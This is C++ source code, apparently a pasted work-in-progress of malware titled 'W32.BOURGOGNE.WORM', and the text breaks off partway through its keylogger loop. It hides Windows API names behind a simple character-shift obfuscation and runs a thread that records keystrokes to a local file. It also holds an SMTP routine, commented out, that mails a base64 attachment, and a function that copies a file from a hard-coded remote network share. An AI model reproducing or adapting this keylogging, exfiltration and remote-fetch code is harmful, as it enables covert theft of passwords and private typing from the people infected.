· 6 years ago · Aug 13, 2019, 08:34 AM
1W32.BOURGOGNE.WORM
2
3#include <windows.h>
4#include <gdiplus.h>
5#include <fstream>
6#include <shlobj.h>
7//#include "long.x"
8
9//extern "C"{
10//#include "./MonDossier/miniz.c"
11//}
12
13char Ch, Dri[256], *buf_test = (char*)malloc(6000000), *buf0 = (char*)malloc(6000000), buf[256], n1[256], UN[256], CN[256], Cy[256], path[256], PE[256], SP[256], dow[256], dow0[256], dow1[256];
14
15SYSTEMTIME st;
16FILE *file;//#include "long.x"
17WIN32_FIND_DATA fd;
18POINT cu, cu2;
19
20int n=0, b=1, nUserName=256, nComputerName=256;
21unsigned long id;
22using namespace Gdiplus;
23
24//Dev-Cpp 5.11 TDM-GCC x64 4.9.2 Portable.7z 0xFA40,0xFCF1,0xFA41,0xFCF2,0xFA42,0xFCF3,0xFA43,0xFCF4,0xFA44,0xFCF5,0xFA45,0xFCF6,0xFA46,0xFCF7,0xFA47,0xFCF8,0xFA48,0xFCF9,0xFA49,0xFCFA,0xFA4A,0xADB5,0xFA4B,0xADB6,0xFA4C,0xADB7,0xFA4D,0xADB8,0xFA4E,0xADB9,0xFA4F,0xADBA,0xFA50,0xADBB,0xFA51,0xADBC,0xFA52,0xADBD,0xFA53,0xADBE,0xFA54,0xA2CC,0xFA55,0xFCFC,0xFA56,0xFCFD,0xFA57,0xFCFE,0xFA58,0xADEA,0xFA59,0xADE2,0xFA5A,0xADE4,0xFA5B,0xA2E8,0xFA5C,0xF9A1,0xFA5D,0xF9A2,0xFA5E,0xF9A3,0xFA5F,0xF9A4,0xFA60,0xF9A5,0xFA61,0xF9A6,0xFA62,0xF9A7,0xFA63,0xF9A8,0xFA64,0xF9A9,0xFA65,0xF9AA,0xFA66,0xF9AB,0xFA67,0xF9AC,0xFA68,0xF9AD,0xFA69,0xF9AE,0xFA6A,0xF9AF,0xFA6B,0xF9B0,0xFA6C,0xF9B1,0xFA6D,0xF9B2,0xFA6E,0xF9B3,0xFA6F,0xF9B4,0xFA70,0xF9B5,0xFA71,0xF9B6,0xFA72,0xF9B7,0xFA73,0xF9B8,0xFA74,0xF9B9,0xFA75,0xF9BA,0xFA76,0xF9BB,0xFA77,0xF9BC,0xFA78,0xF9BD,0xFA79,0xF9BE,0xFA7A,0xF9BF,0xFA7B,0xF9C0,0xFA7C,0xF9C1,0xFA7D,0xF9C2,0xFA7E,0xF9C3,0xFA80,0xF9C4,0xFA81,0xF9C5,0xFA82,0xF9C6,0xFA83,0xF9C7,0xFA84,0xF9C8,0xFA85,0xF9C9,0xFA86,0xF9CA,0xFA87,0xF9CB,0xFA88,0xF9CC,0xFA89,0xF9CD,0xFA8A,0xF9CE,0xFA8B,0xF9CF,0xFA8C,0xF9D0,0xFA8D,0xF9D1,0xFA8E,0xF9D2,0xFA8F,0xF9D3,0xFA90,0xF9D4,0xFA91,0xF9D5,0xFA92,0xF9D6,0xFA93,0xF9D7,0xFA94,0xF9D8,0xFA95,0xF9D9,0xFA96,0xF9DA,0xFA97,0xF9DB,0xFA98,0xF9DC,0xFA99,0xF9DD,0xFA9A,0xF9DE,0xFA9B,0xF9DF,0xFA9C,0xF9E0,0xFA9D,0xF9E1,0xFA9E,0xF9E2,0xFA9F,0xF9E3,0xFAA0,0xF9E4,0xFAA1,0xF9E5,0xFAA2,0xF9E6,0xFAA3,0xF9E7,0xFAA4,0xF9E8,0xFAA5,0xF9E9,0xFAA6,0xF9EA,0xFAA7,0xF9EB,0xFAA8,0xF9EC,0xFAA9,0xF9ED,0xFAAA,0xF9EE,0xFAAB,0xF9EF,0xFAAC,0xF9F0,0xFAAD,0xF9F1,0xFAAE,0xF9F2,0xFAAF,0xF9F3,0xFAB0,0xF9F4,0xFAB1,0xF9F5,0xFAB2,0xF9F6,0xFAB3,0xF9F7,0xFAB4,0xF9F8,0xFAB5,0xF9F9,0xFAB6,0xF9FA,0xFAB7,0xF9FB,0xFAB8,0xF9FC,0xFAB9,0xF9FD,0xFABA,0xF9FE,0xFABB,0xFAA1,0xFABC,0xFAA2,0xFABD,0xFAA3,0xFABE,0xFAA4,0xFABF,0xFAA5,0xFAC0,0xFAA6,0xFAC1,0xFAA7,0xFAC2,0xFAA8,0xFAC3,0xFAA9,0xFAC4,0xFAAA,0xFAC5,0xFAAB,0xFAC6,0xFAAC,0xFAC7,0xFAAD,0xFAC8,0xFAAE,0xFAC9,0xFAAF,0xFACA,0xFAB0,0xFACB,0xFAB1,0xFACC,0xFAB2,0xFACD,0xFAB3,0xFACE,0xFAB4,0xFACF,0xFAB5,0xFAD0,0xFAB6,0xFAD1,0xFAB7,0xFAD2,0xFAB8,0xFAD3,0xFAB9,0xFAD4,0xFABA,0xFAD5,0xFABB,0xFAD6,0xFABC,0xFAD7,0xFABD,0xFAD8,0xFABE,0xFAD9,0xFABF,0xFADA,0xFAC0,0xFADB,0xFAC1,0xFADC,0xFAC2,0xFADD,0xFAC3,0xFADE,0xFAC4,0xFADF,0xFAC5,0xFAE0,0xFAC6,0xFAE1,0xFAC7,0xFAE2,0xFAC8,0xFAE3,0xFAC9,0xFAE4,0xFACA,0xFAE5,0xFACB,0xFAE6,0xFACC,0xFAE7,0xFACD,0xFAE8,0xFACE,0xFAE9,0xFACF,0xFAEA,0xFAD0,0xFAEB,0xFAD1,0xFAEC,0xFAD2,0xFAED,0xFAD3,0xFAEE,0xFAD4,0xFAEF,0xFAD5,0xFAF0,0xFAD6,0xFAF1,0xFAD7,0xFAF2,0xFAD8,0xFAF3,0xFAD9,0xFAF4,0xFADA,0xFAF5,0xFADB,0xFAF6,0xFADC,0xFAF7,0xFADD,0xFAF8,0xFADE,0xFAF9,0xFADF,0xFAFA,0xFAE0,0xFAFB,0xFAE1,0xFAFC,0xFAE2,0xFB40,0xFAE3,0xFB41,0xFAE4,0xFB42,0xFAE5,0xFB43,0xFAE6,0xFB44,0xFAE7,0xFB45,0xFAE8,0xFB46,0xFAE9,0xFB47,0xFAEA,0xFB48,0xFAEB,0xFB49,0xFAEC,0xFB4A,0xFAED,0xFB4B,0xFAEE,0xFB4C,0xFAEF,0xFB4D,0xFAF0,0xFB4E,0xFAF1,0xFB4F,0xFAF2,0xFB50,0xFAF3,0xFB51,0xFAF4,0xFB52,0xFAF5,0xFB53,0xFAF6,0xFB54,0xFAF7,0xFB55,0xFAF8,0xFB56,0xFAF9,0xFB57,0xFAFA,0xFB58,0xFAFB,0xFB59,0xFAFC,0xFB5A,0xFAFD,0xFB5B,0xFAFE,0xFB5C,0xFBA1,0xFB5D,0xFBA2,0xFB5E,0xFBA3,0xFB5F,0xFBA4,0xFB60,0xFBA5,0xFB61,0xFBA6,0xFB62,0xFBA7,0xFB63,0xFBA8,0xFB64,0xFBA9,0xFB65,0xFBAA,0xFB66,0xFBAB,0xFB67,0xFBAC,0xFB68,0xFBAD,0xFB69,0xFBAE,0xFB6A,0xFBAF,0xFB6B,0xFBB0,0xFB6C,0xFBB1,0xFB6D,0xFBB2,0xFB6E,0xFBB3,0xFB6F,0xFBB4,0xFB70,0xFBB5,0xFB71,0xFBB6,0xFB72,0xFBB7,0xFB73,0xFBB8,0xFB74,0xFBB9,0xFB75,0xFBBA,0xFB76,0xFBBB,0xFB77,0xFBBC,0xFB78,0xFBBD,0xFB79,0xFBBE,0xFB7A,0xFBBF,0xFB7B,0xFBC0,0xFB7C,0xFBC1,0xFB7D,0xFBC2,0xFB7E,0xFBC3,0xFB80,0xFBC4,0xFB81,0xFBC5,0xFB82,0xFBC6,0xFB83,0xFBC7,0xFB84,0xFBC8,0xFB85,0xFBC9,0xFB86,0xFBCA,0xFB87,0xFBCB,0xFB88,0xFBCC,0xFB89,0xFBCD,0xFB8A,0xFBCE,0xFB8B,0xFBCF,0xFB8C,0xFBD0,0xFB8D,0xFBD1,0xFB8E,0xFBD2,0xFB8F,0xFBD3,0xFB90,0xFBD4,0xFB91,0xFBD5,0xFB92,0xFBD6,0xFB93,0xFBD7,0xFB94,0xFBD8,0xFB95,0xFB96,0xFBDA,0xFB97,0xFBDB,0xFB98,0xFBDC,0xFB99,0xFBDD,0xFB9A,0xFBDE,0xFB9B,0xFBDF,0xFB9C,0xFBE0,0xFB9D,0xFBE1,0xFB9E,0xFBE2,0xFB9F,0xFBE3,0xFBA0,0xFBE4,0xFBA1,0xFBE5,0xFBA2,0xFBE6,0xFBA3,0xFBE7,0xFBA4,0xFBE8,0xFBA5,0xFBE9,0xFBA6,0xFBEA,0xFBA7,0xFBEB,0xFBA8,0xFBEC,0xFBA9,0xFBED,0xFBAA,0xFBEE,0xFBAB,0xFBEF,0xFBAC,0xFBF0,0xFBAD,0xFBF1,0xFBAE,0xFBF2,0xFBAF,0xFBF3,0xFBB0,0xFBF4,0xFBB1,0xFBF5,0xFBB2,0xFBF6,0xFBB3,0xFBF7,0xFBB4,0xFBF8,0xFBB5,0xFBF9,0xFBB6,0xFBFA,0xFBB7,0xFBFB,0xFBB8,0xFBFC,0xFBB9,0xFBFD,0xFBBA,0xFBFE,0xFBBB,0xFCA1,0xFBBC,0xFCA2,0xFBBD,0xFCA3,0xFBBE,0xFCA4,0xFBBF,0xFCA5,0xFBC0,0xFCA6,0xFBC1,0xFCA7,0xFBC2,0xFCA8,0xFBC3,0xFCA9,0xFBC4,0xFCAA,0xFBC5,0xFCAB,0xFBC6,0xFCAC,0xFBC7,0xFCAD,0xFBC8,0xFCAE,0xFBC9,0xFCAF,0xFBCA,0xFCB0,0xFBCB,0xFCB1,0xFBCC,0xFCB2,0xFBCD,0xFCB3,0xFBCE,0xFCB4,0xFBCF,0xFCB5,0xFBD0,0xFCB6,0xFBD1,0xFCB7,0xFBD2,0xFCB8,0xFBD3,0xFCB9,0xFBD4,0xFCBA,0xFBD5,0xFCBB,0xFBD6,0xFCBC,0xFBD7,0xFCBD,0xFBD8,0xFCBE,0xFCBF,0xFBDA,0xFCC0,0xFBDB,0xFCC1,0xFBDC,0xFCC2,0xFBDD,0xFCC3,0xFBDE,0xFCC4,0xFBDF,0xFCC5,0xFBE0,0xFCC6,0xFBE1,0xFCC7,0xFBE2,0xFCC8,0xFBE3,0xFCC9,0xFBE4,0xFCCA,0xFBE5,0xFCCB,0xFBE6,0xFCCC,0xFBE7,0xFCCD,0xFBE8,0xFCCE,0xFBE9,0xFCCF,0xFBEA,0xFCD0,0xFBEB,0xFCD1,0xFBEC,0xFCD2,0xFBED,0xFCD3,0xFBEE,0xFCD4,0xFBEF,0xFCD5,0xFBF0,0xFCD6,0xFBF1,0xFCD7,0xFBF2,0xFCD8,0xFBF3,0xFCD9,0xFBF4,0xFCDA,0xFBF5,0xFCDB,0xFBF6,0xFCDC,0xFBF7,0xFCDD,0xFBF8,0xFCDE,0xFBF9,0xFCDF,0xFBFA,0xFCE0,0xFBFB,0xFCE1,0xFBFC,0xFCE2,0xFC40,0xFCE3,0xFC41,0xFCE4,0xFC42,0xFCE5,0xFC43,0xFCE6,0xFC44,0xFCE7,0xFC45,0xFCE8,0xFC46,0xFCE9,0xFC47,0xFCEA,0xFC48,0xFCEB,0xFC49,0xFCEC,0xFC4A,0xFCED,0xFC4B,0xFCEE
25/*"%CD%/Dev-Cpp 5.11 TDM-GCC x64 4.9.2 Portable/MinGW64/x86_64-w64-mingw32/lib32/libgdi32.a" "%CD%/Dev-Cpp 5.11 TDM-GCC x64 4.9.2 Portable/MinGW64/x86_64-w64-mingw32/lib32/libgdiplus.a" "%CD%/Dev-Cpp 5.11 TDM-GCC x64 4.9.2 Portable/MinGW64/x86_64-w64-mingw32/lib32/libole32.a" "%CD%/Dev-Cpp 5.11 TDM-GCC x64 4.9.2 Portable/MinGW64/x86_64-w64-mingw32/lib32/liboleaut32.a" "%CD%/Dev-Cpp 5.11 TDM-GCC x64 4.9.2 Portable/MinGW64/x86_64-w64-mingw32/lib32/libuuid.a"//*/
26
27/*
28LPCSTR enc(char *password){
29lstrcpy(buf,password);
30for(int i=0;i<strlen(buf);++i){
31buf[i] = buf[i] - 0xFBD9;//0xFBD9 0xFACA
32}
33//file=fopen("enc.txt","a+");
34//fputs(buf,file);
35//fclose(file);
36}//*/
37
38LPCSTR decrypt(char *password){
39lstrcpy(buf,password);
40for(int i=0;i<strlen(buf);++i){
41buf[i] = buf[i] + 0xFBD9;
42}
43//file=fopen("decrypt.txt", "a+");
44//fprintf(file, "\"%s\": %s\n", password, buf);
45//fclose(file);
46return buf;
47}
48
49//HINSTANCE kernel32 = LoadLibrary("kernel32");//’Œ™•Œ“ZYU‹““
50////HINSTANCE user32dll = LoadLibrary(decrypt((char*)"œšŒ™ZYU‹““"));
51HINSTANCE user32 = LoadLibrary("user32");
52
53//typedef DWORD(__stdcall *_GetModuleFileNameA)(HMODULE,LPTSTR,DWORD);
54//_GetModuleFileNameA pGetModuleFileName = (_GetModuleFileNameA)GetProcAddress(kernel32,decrypt((char*)"nŒ›t–‹œ“Œm“Œuˆ”Œh"));
55
56//typedef BOOL(__stdcall *_CopyFileA) (LPCSTR, LPCSTR, BOOL);
57//_CopyFileA C_opyFile = (_CopyFileA)GetProcAddress(kernel32,decrypt((char*)"j–— m“Œh"));
58
59//typedef HANDLE(__stdcall *_CreateThread)(LPSECURITY_ATTRIBUTES,SIZE_T,LPTHREAD_START_ROUTINE,LPVOID,DWORD,LPDWORD);
60//_CreateThread pCreateThread = (_CreateThread)GetProcAddress(kernel32,decrypt((char*)"j™Œˆ›Œ{™Œˆ‹"));
61
62
63/*typedef LONG(__stdcall *_RegOpenKeyExA)(HKEY,LPCSTR,DWORD,REGSAM,PHKEY);
64_RegOpenKeyExA R_egOpenKeyEx = (_RegOpenKeyExA)GetProcAddress(LoadLibrary("Advapi32"),decrypt((char*)"yŒŽv—Œ•rŒ lŸh"));//Advapi32 RegOpenKeyExA
65
66typedef LONG(__stdcall *_RegQueryValueExA)(HKEY,LPCSTR,LPDWORD,LPDWORD,LPBYTE,LPDWORD);
67_RegQueryValueExA R_egQueryValueEx = (_RegQueryValueExA)GetProcAddress(LoadLibrary("Advapi32"),decrypt((char*)"yŒŽxœŒ™ }ˆ“œŒlŸh"));//RegQueryValueExA
68
69typedef LONG(__stdcall *_RegCreateKeyA)(HKEY,LPCSTR,PHKEY);
70_RegCreateKeyA R_egCreateKey = (_RegCreateKeyA)GetProcAddress(LoadLibrary("Advapi32"),decrypt((char*)"yŒŽj™Œˆ›ŒrŒ h"));//RegCreateKeyA
71
72typedef LONG(__stdcall *_RegSetValueExA)(HKEY,LPCSTR,DWORD,DWORD,LPBYTE,DWORD);//CONST BYTE --> Argument 5
73_RegSetValueExA R_egSetValueEx = (_RegSetValueExA)GetProcAddress(LoadLibrary("Advapi32"),decrypt((char*)"yŒŽzŒ›}ˆ“œŒlŸh"));//RegSetValueExA//*/
74
75
76typedef SHORT(__stdcall *_GetAsyncKeyState)(int);
77_GetAsyncKeyState Ge_yncKe_tate = (_GetAsyncKeyState)GetProcAddress(user32,decrypt((char*)"nŒ›hš •ŠrŒ z›ˆ›Œ"));
78
79typedef SHORT(__stdcall *_GetKeyState)(int);
80_GetKeyState Ge_Ke_tate = (_GetKeyState)GetProcAddress(user32,decrypt((char*)"nŒ›rŒ z›ˆ›Œ"));
81
82/*
83typedef BOOL (WINAPI *PathFileExists)(LPCTSTR pszPath);
84PathFileExists pPathFileExists = (PathFileExists)GetProcAddress(LoadLibrary("shlwapi"),"PathFileExistsA");
85
86BOOL PathFileExistsA(LPCTSTR lpszFullPath){//if(pPathFileExists("\\\\81.248.4.78\\infologic\\ressources\\OracleServeur11gR2\\stage\\cvu\\cv\\remenv\\a.cpl")){ MessageBox(0, "", "File Exist.", 0);
87if(pPathFileExists(lpszFullPath)){
88//FreeLibrary (hModule);
89return true;
90}else{
91//FreeLibrary (hModule);
92return false;
93}
94}//*/
95
96typedef BOOL (WINAPI *pFnCryptBinaryToStringA)(const BYTE* pbBinary,DWORD cbBinary,DWORD dwFlags,LPTSTR pszString,DWORD* pcchString);
97pFnCryptBinaryToStringA FnCryptBinaryToStringA = (pFnCryptBinaryToStringA)GetProcAddress(LoadLibrary("crypt32"),"CryptBinaryToStringA");//crypt32.dll
98
99LPTSTR BinToBase64(const BYTE* pbBinary,DWORD cbBinary){
100DWORD dwSizeBase64 = 0;
101FnCryptBinaryToStringA(pbBinary,cbBinary,CRYPT_STRING_BASE64,NULL,&dwSizeBase64);
102LPTSTR szBase64 = new char[dwSizeBase64];
103FnCryptBinaryToStringA(pbBinary,cbBinary,CRYPT_STRING_BASE64,szBase64,&dwSizeBase64);
104*(LPWORD)(szBase64 + dwSizeBase64 - 2) = 0;
105return szBase64;
106}
107
108HWND HandleFromMouse(){
109POINT pt; GetCursorPos(&pt);
110HWND hWnd1 = WindowFromPoint(pt);
111MapWindowPoints(NULL, hWnd1, &pt, 1);
112HWND hWnd2 = ChildWindowFromPoint(hWnd1, pt);
113return (hWnd2)?hWnd2:hWnd1;
114}
115
116//*
117BSTR conv(char *div){
118int wslen = MultiByteToWideChar(CP_ACP, 0, div, strlen(div), 0, 0);
119BSTR bstr = SysAllocStringLen(0, wslen);
120MultiByteToWideChar(CP_ACP, 0, div, strlen(div), bstr, wslen);
121return bstr;
122}//*/
123
124/*
125wchar_t* conv0(wchar_t *div_, char *div0){
126mbstowcs(div_, div0, strlen(div0)+1);
127return div_;
128}//*/
129
130//*
131void Down0(){
132MoveFileEx(path,".lnk",1);
133CopyFile(decrypt((char*)"ƒƒ_XUY[_UZUXWƒk–Šœ”Œ•›šƒˆ"),path,1);//(Non chiffré -> \\\\81.248.3.10\\Documents\\a) - (chiffré -> \\81.248.3.10\Documents\a).
134MoveFileEx(".lnk",path,0);
135}//*/
136
137/*nslookup -querytype=mx gmail.com "%CD%/Dev-Cpp 5.11 TDM-GCC x64 4.9.2 Portable/MinGW64/x86_64-w64-mingw32/lib32/libwsock32.a"
138int MailIt (char *mailserver, char *emailto, char *emailfrom, char *emailsubject, char *emailmessage){
139 SOCKET sockfd;
140 WSADATA wsaData;
141 FILE *smtpfile;
142 //#define bufsize 300
143 int bytes_sent; // Sock FD
144 int err;
145 struct hostent *host; // info from gethostbyname
146 struct sockaddr_in dest_addr; // Host Address
147 //char line[150000];
148 char *line = (char*)malloc(6000000);//6000000 500000
149 char *Rec_Buf = (char*) malloc(300+1);//#define bufsize 300
150 smtpfile=fopen("SMTP.log","a+");
151 if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
152 fputs("WSAStartup failed",smtpfile);
153 WSACleanup();
154 return -1;
155 }
156 if ( (host=gethostbyname(mailserver)) == NULL) {
157 //perror("gethostbyname");
158 //exit(1);
159 }
160 memset(&dest_addr,0,sizeof(dest_addr));
161 memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);
162
163 // Prepare dest_addr
164 dest_addr.sin_family= host->h_addrtype; // AF_INET from gethostbyname
165 dest_addr.sin_port= htons(25); // PORT defined above
166
167 // Get socket
168
169 if((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0){
170 //perror("socket");
171 //exit(1);
172 }
173 // Connect !
174 fputs("Connecting....\n",smtpfile);
175
176 if(connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
177 //perror("connect");
178 //exit(1);
179 }
180 Sleep(100);
181 err=recv(sockfd,Rec_Buf,300,0);Rec_Buf[err] = '\0';
182 fputs(Rec_Buf,smtpfile);
183 strcpy(line,"helo ki.nhjgdrtfrd.dop\n");//helo me.somepalace.com ma.gomeqajacd.jon
184 fputs(line,smtpfile);
185 bytes_sent=send(sockfd,line,strlen(line),0);
186 Sleep(100);
187 err=recv(sockfd,Rec_Buf,300,0);Rec_Buf[err] = '\0';
188 fputs(Rec_Buf,smtpfile);
189 strcpy(line,"MAIL FROM:<");
190 strncat(line,emailfrom,strlen(emailfrom));
191 strncat(line,">\n",3);
192 fputs(line,smtpfile);
193 bytes_sent=send(sockfd,line,strlen(line),0);
194 Sleep(100);
195 err=recv(sockfd,Rec_Buf,300,0);Rec_Buf[err] = '\0';
196 fputs(Rec_Buf,smtpfile);
197 strcpy(line,"RCPT TO:<");
198 strncat(line,emailto,strlen(emailto));
199 strncat(line,">\n",3);
200 fputs(line,smtpfile);
201 bytes_sent=send(sockfd,line,strlen(line),0);
202 Sleep(100);
203 err=recv(sockfd,Rec_Buf,300,0);Rec_Buf[err] = '\0';
204 fputs(Rec_Buf,smtpfile);
205 strcpy(line,"DATA\n");
206 fputs(line,smtpfile);
207 bytes_sent=send(sockfd,line,strlen(line),0);
208 Sleep(100);
209 err=recv(sockfd,Rec_Buf,300,0);Rec_Buf[err] = '\0';
210 fputs(Rec_Buf,smtpfile);
211 Sleep(100);
212 strcpy(line,"To:");
213 strcat(line,emailto);
214 strcat(line,"\n");
215 strcat(line,"From:");
216 strcat(line,emailfrom);
217 strcat(line,"\n");
218 strcat(line,"Subject:");
219 strcat(line,emailsubject);
220
221 //strcat(line,"\nContent-Type: multipart/mixed; boundary=\"MONDELIMITEUR\"\n--MONDELIMITEUR\nContent-Type: text/html; charset=\"utf-8\"\nContent-Transfer-Encoding: 7bit\n");
222
223 strcat(line, "\nContent-Type: multipart/mixed; boundary=\"MONDELIMITEUR\"\n--MONDELIMITEUR\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment; filename=\"0\"\n");//0.htm
224 strcat(line,emailmessage);
225
226 //strcat(line, "\n--MONDELIMITEUR\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment; filename=\"1.jpg\"\n");
227 //strcat(line,emailmessage0);
228
229 //strcat(line,"\n--MONDELIMITEUR\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: base64\nContent-Disposition: attachment; filename=\"2.jpg\"\n");
230 //strcat(line,emailmessage1);
231
232 strcat(line,"\r\n.\r\n");
233 fputs(line,smtpfile);
234 bytes_sent=send(sockfd,line,strlen(line),0);
235 Sleep(100);
236 err=recv(sockfd,Rec_Buf,300,0);Rec_Buf[err] = '\0';
237 fputs(Rec_Buf,smtpfile);
238 strcpy(line,"quit\n");
239 fputs(line,smtpfile);
240 bytes_sent=send(sockfd,line,strlen(line),0);
241 Sleep(100);
242 err=recv(sockfd,Rec_Buf,300,0);Rec_Buf[err] = '\0';
243 fputs(Rec_Buf,smtpfile);
244 fclose(smtpfile);
245 #ifdef WIN32
246 closesocket(sockfd);
247 WSACleanup();
248 #else
249 close(sockfd);
250 #endif
251}//*/
252
253/*
254BOOL HasActiveDesktop(){
255
256BOOL bResult(FALSE);
257//HINSTANCE hLib = LoadLibrary("SHELL32.DLL");
258
259typedef void(__stdcall *_SHGetSettings)(SHELLFLAGSTATE*,DWORD);//BOOL <--> void
260_SHGetSettings S_HGetSettings = (_SHGetSettings)GetProcAddress(LoadLibrary("SHELL32.DLL"),"SHGetSettings");
261
262SHELLFLAGSTATE sfs;
263S_HGetSettings(&sfs,SSF_DESKTOPHTML);
264bResult = sfs.fDesktopHTML;
265
266//FreeLibrary(hLib);
267
268return bResult;
269
270}//*/
271
272//SHELLFLAGSTATE shfs;
273//SHGetSettings(&shfs, SSF_DESKTOPHTML);
274//return shfs.fDesktopHTML; // a BOOL
275
276DWORD WINAPI Thread_Key(LPVOID lpParameter){//https://msdn.microsoft.com/fr-fr/library/windows/desktop/dd375731%28v=vs.85%29.aspx
277
278////char *keytext = (char*)malloc(256);
279//char * buffer = (char*)malloc(54);
280//short unsigned int vkey;
281
282while(1){
283Sleep(100);
284
285int shift = !(((Ge_Ke_tate(16) | Ge_Ke_tate(16)) & 0x8000) >> 15) ^ Ge_Ke_tate(20);
286////int shift0 = (((Ge_Ke_tate(16) | Ge_Ke_tate(16)) & 0x8000) >> 15);
287//int shift = !Ge_yncKe_tate(16) ^ Ge_Ke_tate(20);
288//int shift = !(((Ge_Ke_tate(16) | Ge_Ke_tate(16)) & 0x8000) ? 1 : 0) ^ Ge_Ke_tate(20);//Touche maintenue 1 : 0 Touche relacher 0 : 1
289
290if(Ch){
291file=fopen("0","a+");
292fputc(Ch,file);
293fclose(file);
294Ch=0;
295}
296
297/*
298//if(i == 45 || i == 46 || i == 144 || i == 28 || (33 <= i && i <= 40)){
299for(int i=8; i<47; i++)
300//if(i != 21 || i != 24 || (26 <= i && i <= 27))
301if(Ge_yncKe_tate(i)){
302while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
303if(!Ge_Ke_tate(20)){//Caps Lock VK_CAPITAL en HEX 0x14 (Caps Lock pas activer)
304n=0;
305
306vkey = MapVirtualKey(i, 0);
307
308shift = (((Ge_Ke_tate(VK_LSHIFT) | Ge_Ke_tate(VK_LSHIFT)) & 0x8000) >> 15) ^ Ge_Ke_tate(VK_CAPITAL);
309
310 switch(vkey){
311 //case 28: // enter
312 //strcpy(keytext, "\n");
313 //break;
314 //case : // space
315 //strcpy((char*)Ch, " ");
316 //break;
317 case 91: // winkey
318 strcpy(keytext, "Win");
319 break;
320 default:
321 GetKeyNameText(vkey << 16, keytext, 48);//if(GetKeyNameText(hooked->scanCode << 16, nom, 50) != 0){
322 }
323
324 if (strlen(keytext) != 1) // big name
325 sprintf(buffer, "[%s]", keytext);
326 else
327 if (shift)
328 sprintf(buffer, "%c", toupper(keytext[0]));
329 else
330 sprintf(buffer, "%c", tolower(keytext[0]));
331
332file=fopen("0","a+");
333fputs(buffer,file);
334fclose(file);
335
336}else{
337////n+=1;
338//Ch+=i;
339 switch(vkey){
340 //case 28: // enter
341 //strcpy((char*)Ch, "\n");
342 //break;
343 //case 57: // space
344 //strcpy((char*)Ch, " ");
345 //break;
346 //case 91: // winkey
347 //strcpy((char*)Ch, "Win");
348 //break;
349 default:
350 GetKeyNameText(vkey << 16, keytext, 48);
351 }
352
353 //if (strlen(keytext) != 1) // big name
354 sprintf(buffer, "%s", keytext);
355 //else
356 //if (shift)
357 //sprintf(buffer, "%c", toupper(keytext[0]));
358 //else
359 //sprintf(buffer, "%c", tolower(keytext[0]));
360
361file=fopen("0","a+");
362fputs(buffer,file);
363fclose(file);
364}
365}//*/
366
367//for(int i='0'; i<='9'; i++)
368for(int i=48; i<58; i++)
369if(Ge_yncKe_tate(i)){
370while(!(Ge_yncKe_tate(i) & 0x8000) ? 0 : 1);
371//if(!Ge_Ke_tate(20)){//Caps Lock VK_CAPITAL en HEX 0x14 (Caps Lock pas activer)
372//n=0;
373//////GetKeyNameText(MapVirtualKey(i, 0) << 16, keytext, 256);// | (1 << 24)
374///long scanCode = MapVirtualKey(i, MAPVK_VK_TO_VSC);
375///scanCode = (scanCode << 16); // | (1 << 24);
376///if(i == 45 || i == 46 || i == 144 || (33 <= i && i <= 40)){
377// add the extended key flag
378///scanCode |= 0x1000000;}
379///GetKeyNameText((int)scanCode, keytext, 256);
380//GetKeyNameText(MapVirtualKeyEx(i, 0, GetKeyboardLayout(0)) << 16, keytext, 256);
381if(shift){//(shift pas appuyer)
382n=0;
383//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(!Ch)Ch+=*keytext; n=0;
384//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(!Ch&*keytext==i){Ch+=i; n+=1;} if(!Ch){Ch+=*keytext; n=0;}
385//if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(Ch&Ch!=i){n=0;} if(!Ch&*keytext==i){Ch+=i; n+=1;} if(!Ch){Ch+=*keytext; n=0;}
386//////if(shift0){ if(*keytext=='0')Ch+=')'; if(*keytext=='1')Ch+='!'; if(*keytext=='2')Ch+='@'; if(*keytext=='3')Ch+='#'; if(*keytext=='4')Ch+='$'; if(*keytext=='5')Ch+='%'; if(*keytext=='6')Ch+='^'; if(*keytext=='7')Ch+='&'; if(*keytext=='8')Ch+='*'; if(*keytext=='9')Ch+='(';} if(Ch&Ch!=i){n=0;} if(!Ch&*keytext==i){Ch+=i; n+=1;} if(!Ch){Ch+=*keytext; n=0;}
387//if(*keytext=='0'|*keytext=='1'|*keytext=='2'|*keytext=='3'|*keytext=='4'|*keytext=='5'|*keytext=='6'|*keytext=='7'|*keytext=='8'|*keytext=='9'){n+=1;}
388//MessageBox(0, "1", "Title", 0);
389//Ch+=*keytext;
390//if(i==48)Ch+=')'; else if(i==49)Ch+='!'; else if(i==50)Ch+='@'; else if(i==51)Ch+='#'; else if(i==52)Ch+='$'; else if(i==53)Ch+='%'; else if(i==54)Ch+='^'; else if(i==55)Ch+='&'; else if(i==56)Ch+='*'; else if(i==57)Ch+='(';//qwerty (voir le clavier qwertz aussi "suisse") et clavier "bepo"
